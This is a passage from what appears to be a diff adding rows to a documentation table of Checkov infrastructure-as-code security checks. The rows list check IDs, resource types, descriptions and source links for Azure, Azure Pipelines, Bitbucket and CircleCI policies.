azurerm_monitor_activity_log_alert | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | +| 2257 | CKV2_AZURE_8 | resource | azurerm_storage_account | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | +| 2258 | CKV2_AZURE_8 | resource | azurerm_storage_container | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | +| 2259 | CKV2_AZURE_9 | resource | azurerm_virtual_machine | Ensure Virtual Machines are utilizing Managed Disks | Terraform | [VirtualMachinesUtilizingManagedDisks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VirtualMachinesUtilizingManagedDisks.yaml) | +| 2260 | CKV2_AZURE_10 | resource | azurerm_virtual_machine | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines | Terraform | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml) | +| 2261 | CKV2_AZURE_10 | resource | azurerm_virtual_machine_extension | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines | Terraform | 
[AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml) | +| 2262 | CKV2_AZURE_11 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer encryption at rest uses a customer-managed key | Terraform | [DataExplorerEncryptionUsesCustomKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DataExplorerEncryptionUsesCustomKey.yaml) | +| 2263 | CKV2_AZURE_12 | resource | azurerm_virtual_machine | Ensure that virtual machines are backed up using Azure Backup | Terraform | [VMHasBackUpMachine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VMHasBackUpMachine.yaml) | +| 2264 | CKV2_AZURE_13 | resource | azurerm_mssql_server_security_alert_policy | Ensure that sql servers enables data security policy | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml) | +| 2265 | CKV2_AZURE_13 | resource | azurerm_sql_server | Ensure that sql servers enables data security policy | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml) | +| 2266 | CKV2_AZURE_14 | resource | azurerm_managed_disk | Ensure that Unattached disks are encrypted | Terraform | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml) | +| 2267 | CKV2_AZURE_14 | resource | azurerm_virtual_machine | Ensure that Unattached disks are encrypted | Terraform | 
[AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml) | +| 2268 | CKV2_AZURE_15 | resource | azurerm_data_factory | Ensure that Azure data factories are encrypted with a customer-managed key | Terraform | [AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml) | +| 2269 | CKV2_AZURE_16 | resource | azurerm_mysql_server | Ensure that MySQL server enables customer-managed key for encryption | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml) | +| 2270 | CKV2_AZURE_16 | resource | azurerm_mysql_server_key | Ensure that MySQL server enables customer-managed key for encryption | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml) | +| 2271 | CKV2_AZURE_17 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables customer-managed key for encryption | Terraform | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml) | +| 2272 | CKV2_AZURE_17 | resource | azurerm_postgresql_server_key | Ensure that PostgreSQL server enables customer-managed key for encryption | Terraform | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml) | +| 2273 | CKV2_AZURE_19 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces have no IP firewall rules attached | arm | 
[AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.py) | +| 2274 | CKV2_AZURE_19 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces have no IP firewall rules attached | Bicep | [AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.py) | +| 2275 | CKV2_AZURE_19 | resource | azurerm_synapse_workspace | Ensure that Azure Synapse workspaces have no IP firewall rules attached | Terraform | [AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml) | +| 2276 | CKV2_AZURE_20 | resource | azurerm_log_analytics_storage_insights | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | +| 2277 | CKV2_AZURE_20 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | +| 2278 | CKV2_AZURE_20 | resource | azurerm_storage_table | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | +| 2279 | CKV2_AZURE_21 | resource | azurerm_log_analytics_storage_insights | Ensure 
Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | +| 2280 | CKV2_AZURE_21 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | +| 2281 | CKV2_AZURE_21 | resource | azurerm_storage_container | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | +| 2282 | CKV2_AZURE_22 | resource | azurerm_cognitive_account | Ensure that Cognitive Services enables customer-managed key for encryption | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml) | +| 2283 | CKV2_AZURE_22 | resource | azurerm_cognitive_account_customer_managed_key | Ensure that Cognitive Services enables customer-managed key for encryption | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml) | +| 2284 | CKV2_AZURE_23 | resource | Microsoft.AppPlatform/Spring | Ensure Azure spring cloud is configured with Virtual network (Vnet) | arm | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/graph_checks/AzureSpringCloudConfigWithVnet.yaml) | +| 2285 | CKV2_AZURE_23 | resource | azurerm_spring_cloud_service | Ensure Azure 
spring cloud is configured with Virtual network (Vnet) | Terraform | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSpringCloudConfigWithVnet.yaml) | +| 2286 | CKV2_AZURE_24 | resource | azurerm_automation_account | Ensure Azure automation account does NOT have overly permissive network access | Terraform | [AzureAutomationAccNotOverlyPermissiveNetAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccNotOverlyPermissiveNetAccess.yaml) | +| 2287 | CKV2_AZURE_25 | resource | azurerm_mssql_database | Ensure Azure SQL database Transparent Data Encryption (TDE) is enabled | Terraform | [AzureSqlDbEnableTransparentDataEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSqlDbEnableTransparentDataEncryption.yaml) | +| 2288 | CKV2_AZURE_26 | resource | azurerm_postgresql_flexible_server_firewall_rule | Ensure Azure PostgreSQL Flexible server is not configured with overly permissive network access | Terraform | [AzurePostgreSQLFlexServerNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLFlexServerNotOverlyPermissive.yaml) | +| 2289 | CKV2_AZURE_27 | resource | Microsoft.Sql/servers | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | arm | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py) | +| 2290 | CKV2_AZURE_27 | resource | Microsoft.Sql/servers | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | Bicep | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py) | +| 2291 | CKV2_AZURE_27 | resource | azurerm_mssql_server | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | 
Terraform | [AzureConfigMSSQLwithAD.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureConfigMSSQLwithAD.yaml) | +| 2292 | CKV2_AZURE_28 | resource | azurerm_container_group | Ensure Container Instance is configured with managed identity | Terraform | [AzureContainerInstanceconfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureContainerInstanceconfigManagedIdentity.yaml) | +| 2293 | CKV2_AZURE_29 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster has Azure CNI networking enabled | Terraform | [AzureAKSclusterAzureCNIEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAKSclusterAzureCNIEnabled.yaml) | +| 2294 | CKV2_AZURE_30 | resource | azurerm_container_registry_webhook | Ensure Azure Container Registry (ACR) has HTTPS enabled for webhook | Terraform | [AzureACR_HTTPSwebhook.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureACR_HTTPSwebhook.yaml) | +| 2295 | CKV2_AZURE_31 | resource | azurerm_subnet | Ensure VNET subnet is configured with a Network Security Group (NSG) | Terraform | [AzureSubnetConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSubnetConfigWithNSG.yaml) | +| 2296 | CKV2_AZURE_32 | resource | azurerm_key_vault | Ensure private endpoint is configured to key vault | Terraform | [AzureKeyVaultConfigPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureKeyVaultConfigPrivateEndpoint.yaml) | +| 2297 | CKV2_AZURE_33 | resource | azurerm_storage_account | Ensure storage account is configured with private endpoint | Terraform | 
[AzureStorageAccConfigWithPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithPrivateEndpoint.yaml) | +| 2298 | CKV2_AZURE_34 | resource | azurerm_sql_firewall_rule | Ensure Azure SQL server firewall is not overly permissive | Terraform | [AzureSQLserverNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSQLserverNotOverlyPermissive.yaml) | +| 2299 | CKV2_AZURE_35 | resource | azurerm_recovery_services_vault | Ensure Azure recovery services vault is configured with managed identity | Terraform | [AzureRecoveryServicesvaultConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureRecoveryServicesvaultConfigManagedIdentity.yaml) | +| 2300 | CKV2_AZURE_36 | resource | azurerm_automation_account | Ensure Azure automation account is configured with managed identity | Terraform | [AzureAutomationAccConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccConfigManagedIdentity.yaml) | +| 2301 | CKV2_AZURE_37 | resource | azurerm_mariadb_server | Ensure Azure MariaDB server is using latest TLS (1.2) | Terraform | [AzureMariaDBserverUsingTLS_1_2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverUsingTLS_1_2.yaml) | +| 2302 | CKV2_AZURE_38 | resource | azurerm_storage_account | Ensure soft-delete is enabled on Azure storage account | Terraform | [AzureStorageAccountEnableSoftDelete.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccountEnableSoftDelete.yaml) | +| 2303 | CKV2_AZURE_39 | resource | azurerm_linux_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | 
[AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | +| 2304 | CKV2_AZURE_39 | resource | azurerm_network_interface | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | +| 2305 | CKV2_AZURE_39 | resource | azurerm_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | +| 2306 | CKV2_AZURE_39 | resource | azurerm_windows_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) | +| 2307 | CKV2_AZURE_40 | resource | azurerm_storage_account | Ensure storage account is not configured with Shared Key authorization | Terraform | [AzureStorageAccConfigSharedKeyAuth.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigSharedKeyAuth.yaml) | +| 2308 | CKV2_AZURE_41 | resource | azurerm_storage_account | Ensure storage account is configured with SAS expiration policy | Terraform | [AzureStorageAccConfig_SAS_expirePolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfig_SAS_expirePolicy.yaml) | +| 2309 | CKV2_AZURE_42 | resource | azurerm_postgresql_server | Ensure Azure PostgreSQL server is 
configured with private endpoint | Terraform | [AzurePostgreSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLserverConfigPrivEndpt.yaml) | +| 2310 | CKV2_AZURE_43 | resource | azurerm_mariadb_server | Ensure Azure MariaDB server is configured with private endpoint | Terraform | [AzureMariaDBserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverConfigPrivEndpt.yaml) | +| 2311 | CKV2_AZURE_44 | resource | azurerm_mysql_server | Ensure Azure MySQL server is configured with private endpoint | Terraform | [AzureMySQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMySQLserverConfigPrivEndpt.yaml) | +| 2312 | CKV2_AZURE_45 | resource | azurerm_mssql_server | Ensure Microsoft SQL server is configured with private endpoint | Terraform | [AzureMSSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLserverConfigPrivEndpt.yaml) | +| 2313 | CKV2_AZURE_46 | resource | Microsoft.Synapse/workspaces/vulnerabilityAssessments | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | arm | [AzureSynapseWorkspaceVAisEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSynapseWorkspaceVAisEnabled.py) | +| 2314 | CKV2_AZURE_46 | resource | Microsoft.Synapse/workspaces/vulnerabilityAssessments | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | Bicep | [AzureSynapseWorkspaceVAisEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSynapseWorkspaceVAisEnabled.py) | +| 2315 | CKV2_AZURE_46 | resource | azurerm_synapse_workspace_security_alert_policy | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | Terraform | 
[AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml) | +| 2316 | CKV2_AZURE_46 | resource | azurerm_synapse_workspace_vulnerability_assessment | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | Terraform | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml) | +| 2317 | CKV2_AZURE_47 | resource | azurerm_storage_account | Ensure storage account is configured without blob anonymous access | Terraform | [AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml) | +| 2318 | CKV2_AZURE_48 | resource | Microsoft.Databricks/workspaces | Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption | arm | [DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py) | +| 2319 | CKV2_AZURE_48 | resource | Microsoft.Databricks/workspaces | Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption | Bicep | [DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py) | +| 2320 | CKV2_AZURE_48 | resource | azurerm_databricks_workspace | Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption | Terraform | 
[DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml) |
+| 2321 | CKV2_AZURE_49 | resource | Microsoft.MachineLearningServices/workspaces | Ensure that Azure Machine learning workspace is not configured with overly permissive network access | arm | [AzureMLWorkspacePublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/graph_checks/AzureMLWorkspacePublicNetwork.yaml) |
+| 2322 | CKV2_AZURE_49 | resource | azurerm_machine_learning_workspace | Ensure that Azure Machine learning workspace is not configured with overly permissive network access | Terraform | [AzureMLWorkspacePublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspacePublicNetwork.yaml) |
+| 2323 | CKV2_AZURE_50 | resource | azurerm_machine_learning_workspace | Ensure Azure Storage Account storing Machine Learning workspace high business impact data is not publicly accessible | Terraform | [AzureMLWorkspaceHBIPublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml) |
+| 2324 | CKV2_AZURE_50 | resource | azurerm_storage_account | Ensure Azure Storage Account storing Machine Learning workspace high business impact data is not publicly accessible | Terraform | [AzureMLWorkspaceHBIPublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml) |
+| 2325 | CKV2_AZURE_51 | resource | azurerm_synapse_sql_pool | Ensure Synapse SQL Pool has a security alert policy | Terraform | [SynapseSQLPoolHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasSecurityAlertPolicy.yaml) |
+| 2326 | CKV2_AZURE_51 | resource | azurerm_synapse_sql_pool_security_alert_policy | Ensure Synapse SQL Pool has a security alert policy | Terraform | [SynapseSQLPoolHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasSecurityAlertPolicy.yaml) |
+| 2327 | CKV2_AZURE_52 | resource | azurerm_synapse_sql_pool | Ensure Synapse SQL Pool has vulnerability assessment attached | Terraform | [SynapseSQLPoolHasVulnerabilityAssessment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasVulnerabilityAssessment.yaml) |
+| 2328 | CKV2_AZURE_52 | resource | azurerm_synapse_sql_pool_security_alert_policy | Ensure Synapse SQL Pool has vulnerability assessment attached | Terraform | [SynapseSQLPoolHasVulnerabilityAssessment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasVulnerabilityAssessment.yaml) |
+| 2329 | CKV2_AZURE_52 | resource | azurerm_synapse_sql_pool_vulnerability_assessment | Ensure Synapse SQL Pool has vulnerability assessment attached | Terraform | [SynapseSQLPoolHasVulnerabilityAssessment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasVulnerabilityAssessment.yaml) |
+| 2330 | CKV2_AZURE_53 | resource | azurerm_synapse_workspace | Ensure Azure Synapse Workspace has extended audit logs | Terraform | [SynapseWorkspaceHasExtendedAuditLogs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseWorkspaceHasExtendedAuditLogs.yaml) |
+| 2331 | CKV2_AZURE_54 | resource | azurerm_synapse_sql_pool | Ensure log monitoring is enabled for Synapse SQL Pool | Terraform | [SynapseLogMonitoringEnabledForSQLPool.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseLogMonitoringEnabledForSQLPool.yaml) |
+| 2332 | CKV2_AZURE_54 | resource | azurerm_synapse_sql_pool_extended_auditing_policy | Ensure log monitoring is enabled for Synapse SQL Pool | Terraform | [SynapseLogMonitoringEnabledForSQLPool.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseLogMonitoringEnabledForSQLPool.yaml) |
+| 2333 | CKV_AZUREPIPELINES_1 | azure_pipelines | jobs | Ensure container job uses a non latest version tag | Azure Pipelines | [ContainerLatestTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerLatestTag.py) |
+| 2334 | CKV_AZUREPIPELINES_1 | azure_pipelines | stages[].jobs[] | Ensure container job uses a non latest version tag | Azure Pipelines | [ContainerLatestTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerLatestTag.py) |
+| 2335 | CKV_AZUREPIPELINES_2 | azure_pipelines | jobs | Ensure container job uses a version digest | Azure Pipelines | [ContainerDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerDigest.py) |
+| 2336 | CKV_AZUREPIPELINES_2 | azure_pipelines | stages[].jobs[] | Ensure container job uses a version digest | Azure Pipelines | [ContainerDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerDigest.py) |
+| 2337 | CKV_AZUREPIPELINES_3 | azure_pipelines | jobs[].steps[] | Ensure set variable is not marked as a secret | Azure Pipelines | [SetSecretVariable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/SetSecretVariable.py) |
+| 2338 | CKV_AZUREPIPELINES_3 | azure_pipelines | stages[].jobs[].steps[] | Ensure set variable is not marked as a secret | Azure Pipelines | [SetSecretVariable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/SetSecretVariable.py) |
+| 2339 | CKV_AZUREPIPELINES_5 | azure_pipelines | *.container[] | Detecting image usages in azure pipelines workflows | Azure Pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/DetectImagesUsage.py) |
+| 2340 | CKV_AZUREPIPELINES_5 | azure_pipelines | jobs[] | Detecting image usages in azure pipelines workflows | Azure Pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/DetectImagesUsage.py) |
+| 2341 | CKV_AZUREPIPELINES_5 | azure_pipelines | stages[].jobs[] | Detecting image usages in azure pipelines workflows | Azure Pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/DetectImagesUsage.py) |
+| 2342 | CKV_BCW_1 | provider | bridgecrew | Ensure no hard coded API token exist in the provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/bridgecrew/credentials.py) |
+| 2343 | CKV_BITBUCKET_1 | bitbucket_configuration | * | Merge requests should require at least 2 approvals | bitbucket_configuration | [merge_requests_approvals.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket/checks/merge_requests_approvals.py) |
+| 2344 | CKV_BITBUCKETPIPELINES_1 | bitbucket_pipelines | [{image:image,__startline__:__startline__,__endline__:__endline__}] | Ensure the pipeline image uses a non latest version tag | bitbucket_pipelines | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket_pipelines/checks/latest_image.py) |
+| 2345 | CKV_BITBUCKETPIPELINES_1 | bitbucket_pipelines | pipelines.*.[*][][][].step.{image: image, __startline__: __startline__, __endline__:__endline__} | Ensure the pipeline image uses a non latest version tag | bitbucket_pipelines | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket_pipelines/checks/latest_image.py) |
+| 2346 | CKV_BITBUCKETPIPELINES_1 | bitbucket_pipelines | pipelines.default[].step.{image: image, __startline__: __startline__, __endline__:__endline__} | Ensure the pipeline image uses a non latest version tag | bitbucket_pipelines | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket_pipelines/checks/latest_image.py) |
+| 2347 | CKV_CIRCLECIPIPELINES_1 | circleci_pipelines | jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__} | Ensure the pipeline image uses a non latest version tag | circleci_pipelines | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/latest_image.py) |
+| 2348 | CKV_CIRCLECIPIPELINES_2 | circleci_pipelines | jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__} | Ensure the pipeline image version is referenced via hash not arbitrary tag. | circleci_pipelines | [image_version_not_hash.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/image_version_not_hash.py) |
+| 2349 | CKV_CIRCLECIPIPELINES_3 | circleci_pipelines | orbs.{orbs: @} | Ensure mutable development orbs are not used. | circleci_pipelines | [prevent_development_orbs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/prevent_development_orbs.py) |
